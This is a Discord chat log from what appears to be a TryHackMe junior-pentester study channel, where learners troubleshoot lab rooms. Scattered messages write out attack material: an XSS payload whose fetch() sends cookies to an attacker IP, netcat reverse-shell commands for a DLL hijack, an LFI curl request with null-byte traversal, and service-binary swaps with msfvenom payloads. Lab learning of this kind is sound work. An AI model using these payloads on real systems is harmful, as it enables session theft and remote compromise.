#junior-pentester-path

i'm getting no error message on the task 8 playground question for the LFI room. On previous attempts I was able to get the error message saying it couldn't resolve hostname so i had to edit my python server to use the IP for the VPN connection but now the page just returns without an error. can someone point me in another direction for troubleshooting?

screenshots please???

replace cmd.php with hostname.txt

i tried different file types and names. they both have the same content.

it's not even making a request out to the python server

yeah that's my openvpn popup

the attack box?

the VM that THM provides

i'm not

i'm on my pc

i'm not running a VM

its not running on all interfaces

at the very least

If they're getting the gets then something is going right WRT NAT

Are you making the requests yourself here?

yes that's me just verifying it's working by visiting the site in my browser

if this works in the thm attackbox im gonna scream

It will

it's going to frustrate me to no end that i don't understand why it's not working from my end

Probably firewalls etc

Usual setup is a Kali VM, run the VPN directly in the VM

Hi Guys

which wardriving Site would u recommend?

wigle.net is a little bit buggy

Hi Guys, is the Path "Offensive Pentesting" current or obsolete or replaced by "Jr. Pentesting"?

it is older then jr pentesting but it is not obsolete last shadow heard.... think of it as a continuation of this path if you want

alright, thank you my shadow 🙂

Please don't ask the same question over multiple channels, it is spam

ok, sry

For Task 11 of the "Linux PrivEsc" room - the target machine isn't able to execute the compiled C program. Is this intentional? I keep getting an 'exec format error'

That probably means you've done something wrong

Did you compile it on your own machine?

I did compile it on my own machine

Is your own machine ARM?

omg yes

facepalm

Cross compilation is a pain in the ass for a lot of setups, as a warning

gotcha thanks - completely slipped my mind

noted - thanks for the heads up.

Gave +1 Rep to @idle bison

I can't get task 6 (Metasploit Exploitation) to accept the hash for the second user??

Can you put the hash in spoilers here?

I'll drop the whole line as well as what I expect it should accept (even though I've tried pretty much any combination I could think of)

||claire:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc7002:1002::||

||SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc7002||

Done

Between colons, so $6$ to 7002 inclusive

Doesn't like it

Breaking my head on Subdomain Enumeration Task 6. Virtual Hosts

Anyone know what the MACHINE_IP is? like where am I pulling that value from

You need to press "Start Machine"

Go through the tasks until you find the correct one to start

If a room has multiple machines then each task might have a different machine

I terminated my last one and started new one in task 6

it either pulls nothing or a zillion names, but none are the answers

am I supposed to be using the AttackBox IP for MACHINE_IP?

The deployable machine

If MACHINE_IP is not populated, you HAVE NOT deployed the target machine

hum

Okay, I'll terminate and try again

Thanks!

Remember the definition of insanity is doing the same thing over and over again. Makw sure you're deploying the machine with the button in the top right of a task, not the start attackbox button.

Hitting Start Machine just says its started...and gives me no option to view it

am I then supposed to do Start Attackbox?

isent there something in that defintion talking about expecting the same or different results too???

That seems to be it

Weirdly confusing, but now I get it

Thanks for the assist!

Well, also yes.

the mysteries are revealed

I thought I was going insane xD

Correct, the in-browser access for target machines is very very very rare.

speaking of that, I'm unclear on what's going on with accessing stuff. via OpenVPN. Is it meant to let me do the lessons in my own terminal?

or is my only option attackbox or Kali

Yeah you can use the VPN to comnect to the network

Anyone knows ho i can bypays slash sanitization

?

URL encoding or base64?

....//....//....//, i guess

Lol, I meant using either of those to encode the traversal or whatever. With it being php, URL encoding would probably work best.

Which task you are doing?

I dunno, it wasn't my task. I was replying to this message.

Under "Content discovery"-> Manual Discovery - Favicon, the md5 hash value is not found in the site https://wiki.owasp.org/index.php/OWASP_favicon_database. So unable to answer the question.

Using the curl command

curl https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico | md5sum

Yes in attackbox, yes i am a subscriber

So what's the value you get ?Maybe put it in spoiler

Hi guys

nmap: can someone explain to me what -sC does exactly? I understand that this applies nmap's default scripts to the respective ports, but what kind of scripts are these or what is the purpose of the default scripts?

yes

but somehow I don't get any smarter from it ^^

ok these are the respective scripts. And these are all executed, correct?

you mean RTFM? 😄

thanks, i will do more research. I wonder if by enabling -sC then the other scan types are not used like TCP SYN Scan. I guess I didn't describe my question well

I'd better do some research.

Are you adding the 16541 to your search?
As I assume that's just the speed specification of curl

Yes i was adding, should i remove that?

Sure, that's not part of the md5

Yes you are right, omitting that i find the hash value. Many thanks

If you could maybe consider to delete that message or put it in spoiler, so others have to do it on their own, would be great 🙂

Sure, deleted. Thanks

Can someone explain me what this meterpreter, I googled it but I’m confused

It's a shell like bash or zsh that has commands specifically for exploitation and whatnot.

payload that is used to access reverse shell on your msfconsole

Doesn't have to be reverse shell, can be a lot more. Not used to access a reverse shell.
Meterpreter is a specific type of shell

Attack shell?

Not shell.

Payload

yeah man.

Why cant i get 500 Internal Server Error in burp suite repeater room. I'm changing everything in repeater! just cant seem to get it 😩

Most likely because you haven't tried every single thing that's mentioned in the hint

I have a super newbie question about File Inclusion. Task 4: Local File Inclusion - LFI. I can't figure out the path for question 1 which is "try to read /etc/passwd. What would the request URI be?"

It doesn't seem to be something like "lab1.php?lang=/etc/passwd"

Hint or examples confounding me maybe, idk. Any tips would be appreciated, cheers.

Okay, it worked in the answer but not in the lab. Weird

Screenshot of what's not working in the lab?
You will have to verify first in order to send some.
Or did you solve it meanwhile?

!docs verify

I think it was actually working I just failed to realize it, since the preview was a bunch of gibberish. I mistook is an error

@shadow echo I am blanking on the RFI playground though.

I love THM. But the "one forum for all tasks" thing is hella confusing to read xD

Well I'm not totally sure if I can follow your latest 2 sentences 😄

Oh I mean the File Inclusion Lab Playground

Ye, but what you mean with you are "blanking" on it?

Also, the "one forum for all tasks" ?

Oh, as in, it just says "go do something" but following the examples I can't get it to work

like file inclusion has 8 tasks, but only 1 forum page. People are talking about tasks 1-8 all mixed together. It's difficult to read or find what you need

Oh, you mean the actual forum, so "tryhackme.com/forum" ?
Tbh, I never used that yet so I can't comment on that

Yeah

But, if you verify your THM profile here in discord, you are able to send screenshots to show what exactly you are stuck with, which makes it much easier to help, thus people most likely reply to your question 🙂

Oh. I didn't see a verify

!docs verify

There we go

Appreciate it

You sent earlier and I missed it. Sorry

Not a problem.
So if you explain which step you are exactly stuck with and maybe provide a screenshot of it, I'll happily help you

Here, I am following the examples to no effect. Do I have to create a cmd.txt file in attackbox? or on my local machine even?

Well it basically doesn't matter where, all that matters is that the file you create has to be somewhere reachable for the target machine.

right

So if you are using the attackbox as your attacking machine and not your own local machine, I suggest doing it on the attackbox

Otherwise on your own machine

thanks

That's it? I somewhat think there is more you are stuck with 😄

Haha, yeah I skipped that and am doing Challenge 1

about the POST request with the form

Oh, okay 🙂

I have changed the method to POST and am testing resending

muahaha, I figured it out

this is fun

Hello

Stuck on capturing flag 3 for Task 8 of LFI. I managed the other 2. The hint isn't really helping me, or the forum. Any suggestions here? Cheers

you might need to use burp for that..... and for another hint: POST

I think I tried that but messed it up so got off course

seems like I had the right idea, but wrong implementation

cheers

good luck and hope you get it soon

I believe my issue was not doing it right in burpsuite

but I got it via terminal

oh yeah using curl for it should work nicely too

|| curl -X POST THMIPGOESHERE/challenges/chall3.php -d 'method=POST&file=/etc/flag3%00' --output - ||

you can also use postman installed on machine

i haven't been using attack box

just openvpn

I am not really good with curl but this request seems wrong to me, when you use post you usually want to have body

haha, well it works and shows the required answer

I believe --output - is doing it, body is showing

curl suplices some defaults

i did no burps training lol, i think this is part of my issue

also learning how to use curl is really helpful for a lot of website messing around

so the whole reload/send/forward/proxy etc sometimes is off a step

I prefer terminal to burps, but i realize I should use both..

i will check out postman also thanks

Gave +1 Rep to @mystic plume

@flint owl are you sure you got your answer ? Because you need to read file that is in /etc/flag3 but you are not located in the root (/)

Postman is basically interface for curl, it can also give you curl command, I find it more user friendly, but I guess at the end of the day curl is better

easy enough to .. up.... but think it runs for the root dir when you do it the way they did anyways

Yes, I got the right answer in THM answer field

I used ../../../../ at first, but its not actually needed in this challenge

it works both ways, with or without

so the directory traversal isn't required i guess here

Strange thought the point of chall was to show how to move and read content of files guess the other challs demonstrated that

yes

well sometimes you don't need the .. because it accepts absolute paths as the value of the variable already

I just didn't figure it out when I was doing it lol

not like the ../ tend to hurt things ¯_(ツ)_/¯

Principles of Security room, Task 4, Questions 2 & 4, the answer should be Biba but was rejected

That's not the correct answer

Ah. My bad

http://www.theellipsis.org/hacking-into-nasa/

its a nice story

yo guys idk if this the right channel to ask this but anyone know a really good course for learning OWASP TOP 10 ?

TryHackMe, and learning how the technology actually works behind the scenes.

is there a link to it in tryhackme ?

or you mean
https://tryhackme.com/room/owasptop10 ?

The OWASP Top 10 is a collection of 10 distinct web vulns. THM has lots of content teaching each, for most of those 10 issues.

i see thanks for answering i will try dig to find the path unless #web-fundamentals-path is one of them

Gave +1 Rep to @idle bison

There is much much more to THM than the paths, search on https://tryhackme.com/hacktivities?tab=search

@heavy night Can you see what I mean about people only thinking there's the path content and nothing more?

yea i thought there is only path content but not actual teaching i did take a course from collage in my country but i wanted to go through owasp top 10 since its been a while i kinda dont remember most of stuff i will check this thanks again

how the hell can i copy stuff out of nano

By googling how to 🙂

i mean i did it exactly like google said

alt a

alt 6

and pasting with strg u

if i use strg u here

it just opens thatthe source code

incredible really wasting an hour on how to copy and paste some stuff in linux...

loading the website running on the machine in my task is very slow to load into

i have the vpn on and for some reason it has always been slow

machine is running

and im connected

but it takes forever to load

it loads eventually but thm will ask me to go to a different page or reload the page in some way and it takes forever to get through any box that asks me to do this

seems to only happen on the learning courses though as practice boxes with a site run perfectly fine

Which rooms or path should I do following jr pentester

If you want shadows recommendations it is in this order
#pre-security-legacy-path
#974406074444685322
#junior-pentester-path
#pentest-plus-path
#web-fundamentals-path
#offensive-pentesting-path
#791764435991658556

Why that order when the PenTest+ path is rated as easy while the Jr PT path is intermediate?

Ctrl+shift+c maybe

Right click?

Or for paste, clicking the middle wheel

because junior pentest path covers more stuff then pentest-plus making it an easy break afterwards

Gotcha.

Middle wheel?ctrl+shift+v?

Thanks Ninja - It's something we're exploring, the new learn page outlines better content and we've seen a higher retention rate for users using the new page. Hopefully this helps? We're also having a "Try this path next" after a path is complete.

Gave +1 Rep to @idle bison

Did you have any ideas on how we can better show users path progression?

It's whether they know that there's more on THM, beyond just the paths

perhaps you can have similar recommended rooms at the end of each path module so users can explore more of the site beyond whats on the learn page

Question, would you recommend pre-security pathway before The-Complete-Beginners pathway? Or vice versa

in the list shadow provided they would place complete beginner after web fundamentals.... partly because of how outdated and planned for removal it is

making it hard to learn from it to a decent degree

complete beginner is outdated no?

Oh wow, didn't know it was being planned for removal

or maybe they will just update it heavily but then shadow dunno why they made new paths to kinda replace it

@misty sonnet not sure that it was 🤔

@sage current interesting. Thanks for your feedback

Gave +1 Rep to @misty sonnet

no problem

Under "Junior Pentester Path"-> "Authentication Bypass"->"Username Enumeration" there are questions stating "what is the username starting with si. After running the ffuf, i only got one username. Is the expectation to open the names.txt file and try gving all the usernames which starts with "si". This is a huge list and its like trial and error. Please let know if this is the method to be followed

Hello, I'm getting the below on the console that runs openvpn and when this happens, my connection stops.

TLS Error: Unroutable control packet received from [AF_INET]18.202.129.195:1194 (si=3 op=P_CONTROL_V1)

Any advice?

Please is it advisable to have Kali as a standalone os instead of having both windows and Kali installed on different partitions?

#site-support please

Thanks @steel nymph

Gave +1 Rep to @steel nymph

SOLVED

Hi guys

got that screen on my browser attack box

linprivesc room

thought it was a bug

bc that appeared instead of the attack box

closed attack box and started it again. it works now

Hi guys

im right now stuck here

ive got the explot and compiled it and startet a http server on my machine

everythime i try to wget from target machine

i get the error below

thats the permission set

dont understand, why it needs write permission?

Because you are most likely in a directory you have no write permission in

The thing you're wgetting needs to be put somewhere, so you need to call it from a directory you're able to write to .

How do I get permission to upload images here? I am stuck with something and I wanted to share the screenshot

NVM Got it

Fuuuug I just finished the Windows room two days ago and they revamped it 😭 You already know what I gotta do

I guess, at least, it's good repetition 😂

not sure what I'm doing wrong on task 8 RCE. I'm serving the file and tried using both GET and POST method in burp but I'm getting a weird error

is there something wrong with this? <?PHP print exec('hostname'): ?>

I tried removing the ":" but then the request just loads forever

hello guys can someone help me with the windows privesc room?
im in task 5 and im trying to swap the executable of a service with a msfvenom payload that i already moved to the target machine but i cant seem to get the reverse shell to my nc listener...
i did:
cd C:\PROGRA~2\SYSTEM~1\ ## to move to the service executable directory
move WService.exe WService.exe.bkp ## to change the name of the original executble
move C:\Users\thm-unpriv\rev-svc.exe WService.exe ## to move the msfvenom payload to the directory and changing its name to WService.exe
icacls WService.exe /grant Everyone:F ## to grant the everyone group full permissions

then i stopped the service with "sc stop windowsscheduler" and i opened the nc listener and started the service again with "sc start windowsscheduler"

Hello

I am stuck on content Discovery task 12 (can some one tell me acme IT URL ?)

The URL is the target machine IP

thanks but can't get questions answer 😫

Gave +1 Rep to @shadow echo

any hint ?

hello

anyone here atall

i could use some help

please

Well I don't know what you are stuck on, did you fuzz the directory's ?

yes and gave a lot of directories !

Just ask the question directly. Someone will answer if they can.

There are a lot that start with "/mo" ?

ya

Show me a screenshot pls.
You will have to verify first in order to do so

!docs verify

I will share later ,, now i have to go ..thanks for your help

hello guys have stuck in task 3 upward i think theres a problem with the attach lab each time i try using power shell it get freeze up[7:04 PM]what can i do[7:05 PM]or is there anything im missing[7:05 PM]i really will appreciate some help as this is the last step of the whole session

i really would appreciate not sure what else to do helpppppppppp

Jnr Pentester:WINDOWS PRIVILEGE EXCALATION

Hi everyone.
I cant get the reverse shell in task7 Windows Privilege Escalation room.can anyone please guide me and help with the payload

I’m having the same problem with task 4 I can’t get a reverse shell how do you sort that @modest arch

Please

Having some trouble figuring out how to get the user passwords in Linux PrivEsc. I managed to get the answers by guessing, but I would like to know how to actually do it.

I have root access, and used cat on both /etc/shadow and /etc/passwd. I copied their contents into files on my machine, ran unshadow on them, and tried to use John the Ripper with rockyou.txt. I've tried to do it both with the full shadow/passwd, and with everything but the "matt" line removed (for task 9). It will do like a hundred cracks, then just stop without a result, as shown below.

I don't know if I'm using John incorrectly or if there is something I'm missing? But it's really bothering me

Which linux privesc room is it, since there are more then 1?
Also which task?

This was for task9 on the one with the capstone challenge. I ended up having to use John on the attackbox for it to work, the screenshot was from my own machine

A lot of my problems seem to stem from doing them on my own machine rather than using the attackbox, so that's probably the issue. Just not sure why it does that, since it should in theory be the same

You need to be able to get your hands on it or know what’s been done it’s not all about the answers my dear friend

Except you are doing the right thing but having some technical issue then I don’t see why you should get the above

That would be cheating, please do not ask for answers

Hello good morning my dear friends I know the time zone is different for anybody but I could make use of some help in task task 5 of the new window privilege to escalation room, have done all the right thing but each time I try to download my payload from Kali to windows powershell in task 5 it keeps failing and displaying this I’m I missing anything or can anyone kind of let me know what I’m suppose to be doing and I’m not. @idle bison @willow nova

Please don't ping people to request help

Okay thanks

Mods are not support staff, and support staff do not provide support through discord

kk

@idle bison don’t take it too personal if you can’t help just say it….. it’s that simple a lil hint here and there would go a long way not like I’m even asking for the answers…

The problem is that you're pinging people to demand help

Don't do that.

It's rude.

Yessirrrrrrr

What do you have on display ?

Hey I’m having same problem in task 5 it won’t let me download the payload from Linux(after hosting my http.server)into powershell(windows)even tho I’m doing the right thing , do you have a hint and I’m thinking maybe something wrong with the lab?

It won’t let me send picture here so I sent it to your dm my dear friend it’s okay if you can just check it, not so important you reply or anything

Hello peopleeee, I'm working on the Windows Priv Esc room, Abusing dangerous privilege section.
Executing smbserver.py gives me a traceback error

Exception: Version mismatch: this is the 'cffi' package version 1.14.2, located in '/usr/local/lib/python3.6/dist-packages/cffi/api.py'. When we import the top-level '_cffi_backend' extension module, we get version 1.11.5, located in '/usr/lib/python3/dist-packages/_cffi_backend.cpython-36m-x86_64-linux-gnu.so'. The two versions should be equal; check your installation.

and I cant run sudo apt-update on the attackbox. Any help?

!docs verify

Once you do that, send a screen of the command you're running in PowerShell. Make sure you're including the port number in wget

There are steps to resolve the apt issue pinned in #site-support

THank you. I should have looked thre first, Been staring at the screen all night lol

Hi All, I posted this somewhere else, but maybe here is more appropriate. Could somebody take a look at my shell for the Linux PrivEsc: Crontab section? can't seem to catch it and everything seems to be in order from here

Is your file executable? Does it have the permissions set right?

its a currently existing cronjob that executes once per minute from the home directory, so i'm guessing no issues with that. will double check ,thanks

legend

thanks buddy. kicking myself for that one!

Gave +1 Rep to @idle bison

By the way if you verify, you'll get permission to send images here

!docs verify

oh i was wondering about that. thanks

Happy hacking!

(Y) verified also. nice one

Hi, I'm doing wind privesc Task 7. I'm following every step right but I'm geting admin priv.

not*

Hello, what you guys do went IP is not showing ?

In the task Instead IP , I see MACHINE_IP

You need to start the machine.

green button

Start the machine, then give it time to get up and running.

Hi, I need guide related to burp suite decoder::task4, I downloaded 4 keys tried encoding with MD5 then MD5 hash to ASCII- Text but for all 4 keys couldn't get the same provided MD5 hashsum. Anyone please help me to solve it.

Hello all,
I'm going through the Jr. Pentester path. I'm at the last stage of the XSS where I'm supposed to send the cookie back to me using:

</textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>

I'm swapping {URL_OR_IP} for my IP within the VPN together with the port 9001 ( IP:PORT) in a way that would like ( not putting my IP, just an example )

</textarea><script>fetch('http://10.10.10.10:9001?cookie=' + btoa(document.cookie) );</script>

On the side i have netcat listening on the port 9001. But when i open the ticket created, i don't get anything back

Make sure you hash the whole file, not just the key in the file. Everything in the .txt including the whitespace gets factored into the hash.

I just went through that module yesterday and made the same mistake.

iirc, the flag isn't in the ticket but rather in the request sent to the terminal you're running nc from.

Hello Guys Active Reconnaissance Lab from Junior Pentester Path, cannot connect through telnet

it says Connection closed by foreign host.

any help?

I'm using the Attackbox

Use the attackbox.

somoene can help me plz on Windows Privilege Escalation task 4 ?

Hmm I'm going to try but in theory should be the same effect. Will let you know

Nope, it's a bug

i cant have the reverse shell by the schtasks but it s write that "SUCCESS: Attempted to run the scheduled task "vulntask"." and the code is ok ....

I solved it using md5sum command. Its far more easy than copy pasting.

Indeed it work! Thanks man

Gave +1 Rep to @idle bison

Yo

hello I am trying to scan some target machines in the room Nmap Advanced Port Scans however when it asks me how many ports are unfiltered I cannot find any even though after I change the agressiveness

Is there something I am missing or is there a problem with the room since I didn't have this problem in different rooms or same room different task

Hi, are you using the FIN scan or the NULL scan? And are you scanning all ports?

Hi Gang. I'm doing the last task in Windows PrivEsc and I'm a little confused about the payload.
It's dll hijacking, and i can see where I should be getting the payload to execute and everything, but how am i supposed to know which port to use? (they have provided a payload with the attackbox)

I can make my own payload and do it that way, but this has me thinking maybe i'm confused.

I am doing the exact samething that someone else does in the writeup with a differnet consequence

you can terminate and initiate again the VM, may be something was not correctly set (it had happened to me).

or you could try to issue the same command from the Attack box. I have just tried it and it worked

so, is there a way of checking if my payload is erroring out? currently I have
("C:\tools\nc64.exe -nv 7420 -e cmd.exe")

can i just add '> output.txt' or will that mess up the nc connection?

its for the dll hijacking. for context, this initial example payload worked fine, so im guessing the dll is compiled correctly

#987074227335233607 and you need double slashes in your command and there should be your ip in there somewhere too 🙂

double slashes? yes i have ip in there, sorry i forgot to write above.
oh shit, like C:\ \tools\nc64.exe ... ?

C:\\tools\\nc64.exe 10.10.10.10 1234 -e cmd

always something so simple huh

why is that? just a windows thing?

the double slashes? you have to escape them, cuz the're used for stuff \n(new line) and such

i see! thank you so much for the help!

Gave +1 Rep to @maiden stratus

Jr pentest pathway, windows privilege escalation, task 6 (Abusing dangerous privileges):
When every I run:

/opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL

I get the following error:

Traceback (most recent call last):
File "/opt/impacket/examples/secretsdump.py", line 61, in <module>
from impacket.examples.utils import parse_target
ModuleNotFoundError: No module named 'impacket.examples.utils'

I have tried just about everything I could find online but if anyone else ran into this problem and knows a fix I am all ears.

also I have been using the thm attackbox. I tried a few times on Kali but still wasnt able to figure it out.

are you sure the script is in that folder???

Yes. Thats the path that they say to use one thm as well.

Ive tried downloading the utils.py from githhub but it still says that same error

You need impacket properly installed

I believe I tried that by following the github page but it didnt work. do you remember how you did it?

Yeah, either a proper install with pip or github, or settle for the likely older version in Kali repos

If you're having trouble, use the attackbox

well they already tried the attackbox above it seems and that did not work

I did. I think I might try it on kali later. I found some install instructions for it. ill keep you posted.

I'm tackling this room tonight, so if I work through it, I'll ping ya.

so I did the following to get the secretsdump.py working

from ~ directory:

git clone https://github.com/SecureAuthCorp/impacket.git


cd impacket

    sudo apt install python3 python3-pip

    sudo -H pip3 install --upgrade pip

    sudo python3 setup.py install

    pip3 install -r requirements.txt

    /usr/bin/python3 -m pip install --upgrade pip

    python3 -m pip install .

I have no doubt some of those are redundant but that's what I did. I now, however, can not get the psexec.py to work properly

and instead of using the path they say on thm, I used:

/root/impacket/examples/<pythonfile>

while in the "share" directory where the sam.hive and system.hive were located.

So is burp suite like a nice all in one tool?

for web-based stuff, yeh but you need to pay(~$350) for the pro version to be able to properly use intruder and the scanner and a bunch of it's plugins :/

So that’s more for professionals and people who have their organizations able to sponsor that sort of software

Why I'm not getting MAC address in Null Scan.

Like here :

is it due to version change or what? Anyone please guide. Where I'm mistaking

Yes It is.

https://tryhackme.com/room/nmap03

Nmap Advanced port scanning

What's wrong

Host is up

I tried with -PR -sn, But still the same.

Attackbox would be on same layer2, VPN is tun rather than tap so only layer 3?

Yeah maybe. But is there any tag to get MAC address outside the network?

How would you?

Due to encapsulation, you can't see that info

Ohh Okay.

Thanks for reminding.

Got it.

Hey people, I am working on the Windows PrivEsc room in this path and I can't figure out why my RevShells get deleted by the Anti Virus (Yesterday it wasn't happening) any idea why?

nvm I managed to fix it

Jr pentest pathway, windows privilege escalation, task 7. could somebody give me a hint please. After I start the modify/repair function on the VNC Server, I cannot locate the vncserver-old.exe file it is not in the Temp folder of the user. Thanks for any help

Hi everyone. 🙂 After doing the nmap rooms in the network security section, one question remains: if nmap runs a tcp syn scan by default, in which scenario world one use the -sS flag?

Is that as regards one of the questions in the rooms, or just a general question on why that flag exists?

It’s a question that came up by reading the nmap rooms. Wrong place to ask?

it only runs -sS by default if run with sudo/root

also specifiying to use a specific scan type make it clearer what happens in writeups and documentation

Ok, makes sense… Thanks! 🙏

can I get help with this task in the new "windows privilege escalation" room

the task exploit a vulnerability in RealVNC 6.8.0 using created malicious .dll file and then after following the steps of creating the .dll file he asked me to change the payload that exists in the script to perform a reverse shell but it doesn't work for me .
appreciate any help.

Did you manage to get it so that it produces the output.txt file?

yes

So you know it runs whatever line of code that is, so replace that with the reverse shell.

As it notes, nc.exe is already on the machine.

Make sure you pay attention to the syntax of the reverse shell in that line of code, it's written in C. There are some hints in the forum posts about it

You'll only see that file for a brief second in that folder, what you're looking for is output.txt in C:\ to confirm the repair is running the line of code

I'm now trying this payload:
system("C:\tools\nc64.exe ATTACKER_IP 4444 -e cmd.exe");

yep just pay attention to the syntax and how many backslashes are used, compare it to the original formatting in the notes for that step:

okay I'll try this payload : system("C:\\tools\\nc64.exe ATTACKER_IP 4444 -e cmd.exe");

Hello Friends, I have a question can't we detect OS using OpenVPN. Because I'm not getting OS info using OpenVPN. It's only detecting OS with AttackBox

Is it due to number of hops or THM security check.

Does wgetting the dll for the last flag of the Windows privesc room corrupt the file or something? I managed to get the flag bringing it over via SMB, but from two clean runs, I couldn't get the output.txt file to show wgetting the file from my box to the target.

It's possible I screwed up the compilation process I suppose, but it went weirdly smoothly when I changed tacks.

same issue for me, wget file size was 2kb, smb was correct file size

For that you may have saved the header, not the data. I got just under 300kB through wget the first time when it didn't work, then closer to 330kB when I went through SMB.

Most likely, I should of paid more attention

Finally I did it !!

The mistake I did is that I was copying the wrong .dll file to the share
the wrong file name is : adsldp.dll
the true file name is : adsldpc.dll

Thanks for your help @woven pewter

Gave +1 Rep to @woven pewter

no problem 🙂

I've a question. I'm at Subdomain Enumeration task 6.
There is this:

user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.12.146 -fs {size}
This command has a similar syntax to the first apart from the -fs switch, which tells ffuf to ignore any results that are of the specified size.

The above command should have revealed two positive results that we haven't come across before.

Answer the questions below
What is the first subdomain discovered?

I know the answer but what is the goal of this task? What can I do with that subdomain because: "<answer>.FUZZ.acmeitsupport.thm" site doesnt work

The subdomain is instead of FUZZ, so it would be answer.acmeitsupport.thm

My answer is correct but the link doesn't work. That's not a problem because I understand the meaning

Thanks

Ye, if you add that subdomain and IP to your hosts file, you should be able to open the page 🙂

Ah it has to be added to my hostsfile ofcourse

I'm in the Vulnerability Capstone room, and I'm at my wit's end. I'm using the exploit.py script and following all the directions in all of the walkthroughs I've come across dutifully. This includes setting up a Netcat listener. Yet every time, the exploit.py shell_me command returns "No result." I've tried different port numbers. I even tried launching a new VM. Nothing is working, and I'm starting to wonder if this is a flaw in this room.

use the hinted exploit from the attackbox for that

all the others don't seem to work now for some reason

or you could download it here but that feels sketchy to shadow:

I am using the hinted exploit from the Attackbox. It's plain not working. It just keeps returning "No result" instead of a cmd line.

???

could you verify and send a picture of what it is outputting please???

!docs verify

Thanks! I wondered why I couldn't upload images. This is what it's outputting.

Gave +1 Rep to @sage current

As you can see, trying different port numbers does nothing.

do you have nc -lnvp 5345 running in the other tab???

Yes I do!

I've tried starting the listener both before and after running exploit.py. It doesn't matter. I still get "No result," each and every time.

It's asking you to enter your attacking machine IP, not the target machine IP

AHA

THANK YOU so much!

sorry got busy with other stuff but luckly fontaene could answer with the same thingy shadow was about too

I'm so happy I completed this room. I struggled with it on Saturday evening, before I left for a holiday. I completed it sitting here in an Airbnb. On to Metasploit!

Hi everyone. 🙂 I'm in the 'What the shell' room in task 13 'Practice and examples', question 'Upload a webshell on the Windows target and try to obtain a reverse shell using Powershell'. I can connect to the target machine using RDP, I created a php file on my system as explained in task 11, uploaded it to the Windows server on the target machine. Then I browse to the file to execute it and as a parameter, I am passing the Powershell command from task 8, with my IP and port, URL encoded. I have a listener active on my system. But I get an 'Access forbidden' error sent back by the web page. And the listener isn't getting a connection. Any idea what I'm doing wrong ?

OK, I'm on the LFI Challenges, and on the second box, I figured out how to escalate using the cookie, but when I try any php entries, nothing gets returned.

and... I thought about it for like 10 seconds after posting and I think I have a solution

nah, thought I had it, dang it

OMG, I got it!

So fun!

Oof, stuck on 3 though

And 4, I can get it to run echo commands and make it say whatever I want, but if I run hostname, there's no output

sigh

Guess I'll try again tomorrow!

<insert banging head into wall meme here>

Hey Guys!
I'm facing some issues with the "Basic Penetration Testing | John Hammond" room.

I'm trying to scan the machine with VPN, but there is the error with ignored states ports.

The VPN diag is fine.

         _____           _   _            _    __  __
        |_   _| __ _   _| | | | __ _  ___| | _|  \/  | ___                                           
          | || '__| | | | |_| |/ _` |/ __| |/ / |\/| |/ _ \                                          
          | || |  | |_| |  _  | (_| | (__|   <| |  | |  __/                                          
          |_||_|   \__, |_| |_|\__,_|\___|_|\_\_|  |_|\___|                                          
                   |___/                                                                             
                                                                                                     
                                                @MuirlandOracle                                      


[+] Stable internet connection
[+] OpenVPN is installed
[+] tun0 exists
[+] tun0 IP is in the correct range
[+] Only one instance of OpenVPN is running
[+] Confirming connectivity
[+] Connectivity checks completed!
[+] You are connected to the TryHackMe Network
Your TryHackMe IP address is: 10.6.36.104

Happy Hacking!

                                                                                                     
┌──(kali㉿kali)-[~/thm]
└─$ sudo nmap -sC -sV -oN nmap/initial 10.6.36.104                
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-28 11:31 EDT
Nmap scan report for 10.6.36.104
Host is up (0.0000040s latency).
All 1000 scanned ports on 10.6.36.104 are in ignored states.
Not shown: 1000 closed tcp ports (reset)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.06 seconds

The IP looks wrong?

Have you started the machine and got the correct IP? It should start 10.10.xxxx

Strange...
this is what I got:

No, that's YOUR tun0 IP

You need to start the machine in the room

@open musk

Oh, my bad man.
Thank you for your help!!!!

I'm happy to report, I got both flags after knocking myself unconscious (and reading some forum posts)

Hi Guys

I have specified port 80. Why are other ports scanned when I explicitly specified -PS80?

sure, its an TCP Syn Ping Scan

yes, i want just tcp-syn scan only Port 80

no

because i just want do a tcp syn ping scan

there is a different between -sS (TCP Syn Scan) and -PS (TCP Syn Ping Scan)

am i misunderstanding something? 😄

you are missing the -sn flag

You have not specified to do a ping scan in the first place, that would be with the -sn flag as shown in the screen

u are right!

thanks!

Shocker.

https://nmap.org/book/man-host-discovery.html -PS 80 means it will use that port for the host discovery part of the scan

Then it will scan any hosts that it finds as "up"

yes, thats my goal. host discovery

So if you just want host discovery and no scan, you'll need to explicitly state that as shadow and fontaene said

yes, it works

thanks

The nmap documentation is absolutely excellent

Sure, I read them too. Sometimes, unfortunately, I overlook something. If I found something about the documentary, I don't write it in here. I only write in Discord when I can't find something or am blind again 😄

What I'm saying is that the doc is very good, THM is very good, and the THM discord is also very good. Thanks for fast feedback 🙂

@earnest flower I have a question for you, did you have your own framework (Kali for example) for the eJPT... you don't get access to a virtual machine or anything for it right? just an OpenVPN connection?

You can try "tldr". For quick overview to manual pages.

You connect through your own box, yes, whether that's your daily driver or (I'd hope) a VM. That is one thing about their training I'm not a huge fan of, because they've moved towards the browser based stuff.

While the exam itself requires your own system.

Cool, thanks for the response! I gathered as much, just wanted to confirm!!

Yeah, I'd have Kali spun up on a VM

how can I know if a website set a new cookies from devtools?

Depends on the browser you are using.... In the Chrome console it's under application -> cookies, and I think on Firefox it's under the Storage tab

No problem. Good luck!

I think I'm a ways off, but it's probably just imposter syndrome lol... I literally used to be on a red team, but that was a few years back, just getting back into it now (although being a network and security engineer helps keep me fresh on some things)... Plan was to do the Jr Pen Test course here, run a few HTB stuff, then do the INE coursework and then take the test... That's probably overkill, but I like to be prepared... Then I'm going to work towards Pen+ and then (big gulp) OSCP next year... Always been a goal of mine

